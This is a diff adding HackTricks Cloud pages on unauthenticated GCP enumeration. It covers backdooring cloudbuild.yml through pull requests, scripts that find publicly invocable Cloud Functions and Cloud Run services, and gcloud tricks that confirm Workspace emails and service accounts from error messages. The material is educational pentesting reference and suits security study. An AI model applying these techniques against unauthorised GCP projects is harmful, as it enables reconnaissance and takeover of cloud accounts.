+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
new file mode 100644
index 0000000000..57d506c095
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md
@@ -0,0 +1,71 @@
+# GCP - Cloud Build Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Build
+
+For more information about Cloud Build check:
+
+{% content-ref url="../gcp-services/gcp-cloud-build-enum.md" %}
+[gcp-cloud-build-enum.md](../gcp-services/gcp-cloud-build-enum.md)
+{% endcontent-ref %}
+
+### cloudbuild.yml
+
+If you compromise write access over a repository containing a file named **`cloudbuild.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a Cloud Build and exfiltrate the secrets, compromise what is done and also compromise the **Cloud Build service account.**
+
+{% hint style="info" %}
+Note that GCP has the option to allow administrators to control the execution of build systems from external PRs via "Comment Control". Comment Control is a feature where collaborators/project owners **need to comment “/gcbrun” to trigger the build** against the PR and using this feature inherently prevents anyone on the internet from triggering your build systems.
+{% endhint %}
+
+For some related information you could check the page about how to attack Github Actions (similar to this):
+
+{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %}
+[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/)
+{% endcontent-ref %}
+
+### PR Approvals
+
+When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`.
+
+<figure><img src="../../../.gitbook/assets/image (339).png" alt="" width="563"><figcaption></figcaption></figure>
+
+{% hint style="danger" %}
+Therefore, is this is set to **`Not required`**, an attacker could perform a **PR to the branch** that will trigger the execution adding the malicious code execution to the **`cloudbuild.yml`** file and compromise the cloudbuild execution (note that cloudbuild will download the code FROM the PR, so it will execute the malicious **`cloudbuild.yml`**).
+{% endhint %}
+
+Moreover, it's easy to see if some cloudbuild execution needs to be performed when you send a PR because it appears in Github:
+
+<figure><img src="../../../.gitbook/assets/image (340).png" alt=""><figcaption></figcaption></figure>
+
+{% hint style="warning" %}
+Then, even if the cloudbuild is not executed the attacker will be able to see the **project name of a GCP project** that belongs to the company.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
new file mode 100644
index 0000000000..ba70bc1d71
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md
@@ -0,0 +1,103 @@
+# GCP - Cloud Functions Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Functions
+
+More information about Cloud Functions can be found in:
+
+{% content-ref url="../gcp-services/gcp-cloud-functions-enum.md" %}
+[gcp-cloud-functions-enum.md](../gcp-services/gcp-cloud-functions-enum.md)
+{% endcontent-ref %}
+
+### Brute Force URls
+
+**Brute Force the URL format**:
+
+* `https://<region>-<project-gcp-name>.cloudfunctions.net/<func_name>`
+
+It's easier if you know project names.
+
+Check this page for some tools to perform this brute force:
+
+{% content-ref url="./" %}
+[.](./)
+{% endcontent-ref %}
+
+### Enumerate Open Cloud Functions
+
+With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_functions.sh) you can find Cloud Functions that permit unauthenticated invocations.
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find Cloud Functions that permit unauthenticated invocations
+# anywhere in your GCP organization.
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+
+    enabled=$(gcloud services list --project "$proj" | grep "Cloud Functions API")
+
+    if [ -z "$enabled" ]; then
+	continue
+    fi
+
+
+    for func_region in $(gcloud functions list --quiet --project "$proj" --format="value[separator=','](NAME,REGION)"); do
+        # drop substring from first occurence of "," to end of string.
+        func="${func_region%%,*}"
+        # drop substring from start of string up to last occurence of ","
+        region="${func_region##*,}"
+        ACL="$(gcloud functions get-iam-policy "$func" --project "$proj" --region "$region")"
+
+        all_users="$(echo "$ACL" | grep allUsers)"
+        all_auth="$(echo "$ACL" | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $proj: $func"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $proj: $func"
+        fi
+    done
+done
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
new file mode 100644
index 0000000000..fbb978d13f
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md
@@ -0,0 +1,85 @@
+# GCP - Cloud Run Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud Run
+
+For more information about Cloud Run check:
+
+{% content-ref url="../gcp-services/gcp-cloud-run-enum.md" %}
+[gcp-cloud-run-enum.md](../gcp-services/gcp-cloud-run-enum.md)
+{% endcontent-ref %}
+
+### Enumerate Open Cloud Run
+
+With the following code [taken from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_cloudrun.sh) you can find Cloud Run services that permit unauthenticated invocations.
+
+```bash
+#!/bin/bash
+
+############################
+# Run this tool to find Cloud Run services that permit unauthenticated
+# invocations anywhere in your GCP organization.
+# Enjoy!
+############################
+
+for proj in $(gcloud projects list --format="get(projectId)"); do
+    echo "[*] scraping project $proj"
+
+    enabled=$(gcloud services list --project "$proj" | grep "Cloud Run API")
+
+    if [ -z "$enabled" ]; then
+	continue
+    fi
+
+
+    for run in $(gcloud run services list --platform managed --quiet --project $proj --format="get(name)"); do
+        ACL="$(gcloud run services get-iam-policy $run --platform managed --project $proj)"
+
+        all_users="$(echo $ACL | grep allUsers)"
+        all_auth="$(echo $ACL | grep allAuthenticatedUsers)"
+
+        if [ -z "$all_users" ]
+        then
+              :
+        else
+              echo "[!] Open to all users: $proj: $run"
+        fi
+
+        if [ -z "$all_auth" ]
+        then
+              :
+        else
+              echo "[!] Open to all authenticated users: $proj: $run"
+        fi
+    done
+done
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
new file mode 100644
index 0000000000..1fa4e18a25
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md
@@ -0,0 +1,49 @@
+# GCP - Cloud SQL Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Cloud SQL
+
+For more infromation about Cloud SQL check:
+
+{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %}
+[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md)
+{% endcontent-ref %}
+
+### Brute Force
+
+If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials.
+
+Check this page for **different tools to burte-force** different database technologies:
+
+{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force" %}
+
+Remember that with some privileges it's possible to **list all the database users** via GCP API.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
new file mode 100644
index 0000000000..200dd23334
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md
@@ -0,0 +1,49 @@
+# GCP - Compute Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Compute
+
+For more information about Compute and VPC (Networking) check:
+
+{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %}
+[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/)
+{% endcontent-ref %}
+
+### SSRF - Server Side Request Forgery
+
+If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check:
+
+{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" %}
+
+### Vulnerable exposed services
+
+If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
new file mode 100644
index 0000000000..7890c33017
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-iam-principals-and-org-unauthenticated-enum.md
@@ -0,0 +1,140 @@
+# GCP - IAM, Principals & Org Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Iam & GCP Principals
+
+For more information check:
+
+{% content-ref url="../gcp-services/gcp-iam-and-org-policies-enum.md" %}
+[gcp-iam-and-org-policies-enum.md](../gcp-services/gcp-iam-and-org-policies-enum.md)
+{% endcontent-ref %}
+
+### Is domain used in Workspace?
+
+1. **Check DNS records**
+
+If it has a **`google-site-verification`** record it's probable that it's (or it was) using Workspace:
+
+```
+dig txt hacktricks.xyz
+
+[...]
+hacktricks.xyz.		3600	IN	TXT	"google-site-verification=2mWyPXMPXEEy6QqWbCfWkxFTcQhyYdwHrOxee1Yeo-0"
+hacktricks.xyz.		3600	IN	TXT	"google-site-verification=C19PtLcZ1EGyzUYYJTX1Tp6bOGessxzN9gqE-SVKhRA"
+hacktricks.xyz.		300	IN	TXT	"v=spf1 include:usb._netblocks.mimecast.com include:_spf.google.com include:_spf.psm.knowbe4.com include:_spf.salesforce.com include:spf.mandrillapp.com ~all"
+```
+
+If something like **`include:_spf.google.com`** also appears it confirms it (note that if it doesn't appear it doesn't denies it as a domain can be in Workspace without using gmail as mail provider).
+
+2. **Try to setup a Workspace with that domain**
+
+Another option is to try to setup a Workspace using the domain, if it **complains that the domain is already used** (like in the image), you know it's already used!
+
+To try to setup a Workspace domain follow: [https://workspace.google.com/business/signup/welcome](https://workspace.google.com/business/signup/welcome)
+
+<figure><img src="../../../.gitbook/assets/image (330).png" alt=""><figcaption></figcaption></figure>
+
+3. **Try to recover the password of an email using that domain**
+
+If you know any valid email address being use din that domain (like: admin@email.com or info@email.com) you can try to **recover the account** in [https://accounts.google.com/signin/v2/recoveryidentifier](https://accounts.google.com/signin/v2/recoveryidentifier), and if try doesn't shows an error indicating that Google has no idea about that account, then it's using Workspace.
+
+### Enumerate emails and service accounts
+
+It's possible to **enumerate valid emails of a Workspace domain and SA emails** by trying to assign them permissions and checking the error messages. For this you just need to have permissions to assign permission to a project (which can be just owned by you).
+
+Note that to check them but even if they exist not grant them a permission you can use the type **`serviceAccount`** when it's an **`user`** and **`user`** when it's a **`SA`**:
+
+{% code overflow="wrap" %}
+```bash
+# Try to assign permissions to user 'unvalid-email-34r434f@hacktricks.xyz'
+# but indicating it's a service account
+gcloud projects add-iam-policy-binding <project-controlled-by-you> \
+  --member='serviceAccount:unvalid-email-34r434f@hacktricks.xyz' \
+  --role='roles/viewer'
+## Response:
+ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: User unvalid-email-34r434f@hacktricks.xyz does not exist.
+
+# Now try with a valid email
+gcloud projects add-iam-policy-binding <project-controlled-by-you> \
+  --member='serviceAccount:support@hacktricks.xyz' \
+  --role='roles/viewer'
+# Response:
+ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal support@hacktricks.xyz is of type "user". The principal should appear as "user:support@hacktricks.xyz". See https://cloud.google.com/iam/help/members/types for additional documentation.
+```
+{% endcode %}
+
+A faster way to enumerate Service Accounts in know projects is just to try to access to the URL: `https://iam.googleapis.com/v1/projects/<project-id>/serviceAccounts/<sa-email>`\
+For examlpe: `https://iam.googleapis.com/v1/projects/gcp-labs-3uis1xlx/serviceAccounts/appengine-lab-1-tarsget@gcp-labs-3uis1xlx.iam.gserviceaccount.com`
+
+If the response is a 403, it means that the SA exists. But if the answer is a 404 it means that it doesn't exist:
+
+```json
+// Exists
+{
+  "error": {
+    "code": 403,
+    "message": "Method doesn't allow unregistered callers (callers without established identity). Please use API Key or other form of API consumer identity to call this API.",
+    "status": "PERMISSION_DENIED"
+  }
+}
+
+// Doesn't exist
+{
+  "error": {
+    "code": 404,
+    "message": "Unknown service account",
+    "status": "NOT_FOUND"
+  }
+}
+```
+
+Note how when the user email was valid the error message indicated that they type isn't, so we managed to discover that the email support@hacktricks.xyz exists without granting it any privileges.
+
+You can so the **same with Service Accounts** using the type **`user:`** instead of **`serviceAccount:`**:
+
+{% code overflow="wrap" %}
+```bash
+# Non existent
+gcloud projects add-iam-policy-binding <project-controlled-by-you> \
+  --member='serviceAccount:<invalid-sa-name>@<proj-uniq-name>.iam.gserviceaccount.com' \
+  --role='roles/viewer'
+# Response
+ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: User <invalid-sa-name>@<proj-uniq-name>.iam.gserviceaccount.com does not exist.
+
+# Existent
+gcloud projects add-iam-policy-binding <project-controlled-by-you> \
+  --member='serviceAccount:<sa-name>@<proj-uniq-name>.iam.gserviceaccount.com' \
+  --role='roles/viewer'
+# Response
+ERROR: (gcloud.projects.add-iam-policy-binding) INVALID_ARGUMENT: Principal testing@digital-bonfire-410512.iam.gserviceaccount.com is of type "serviceAccount". The principal should appear as "serviceAccount:testing@digital-bonfire-410512.iam.gserviceaccount.com". See https://cloud.google.com/iam/help/members/types for additional documentation.
+```
+{% endcode %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
new file mode 100644
index 0000000000..143207a711
--- /dev/null
+++ b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md
@@ -0,0 +1,46 @@
+# GCP - Source Repositories Unauthenticated Enum
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Source Repositories
+
+For more information about Source Repositories check:
+
+{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %}
+[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md)
+{% endcontent-ref %}
+
+### Compromise External Repository
+
+If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and:
+
+* If someone uses Cloud Shell to develop the repository it could be compromised
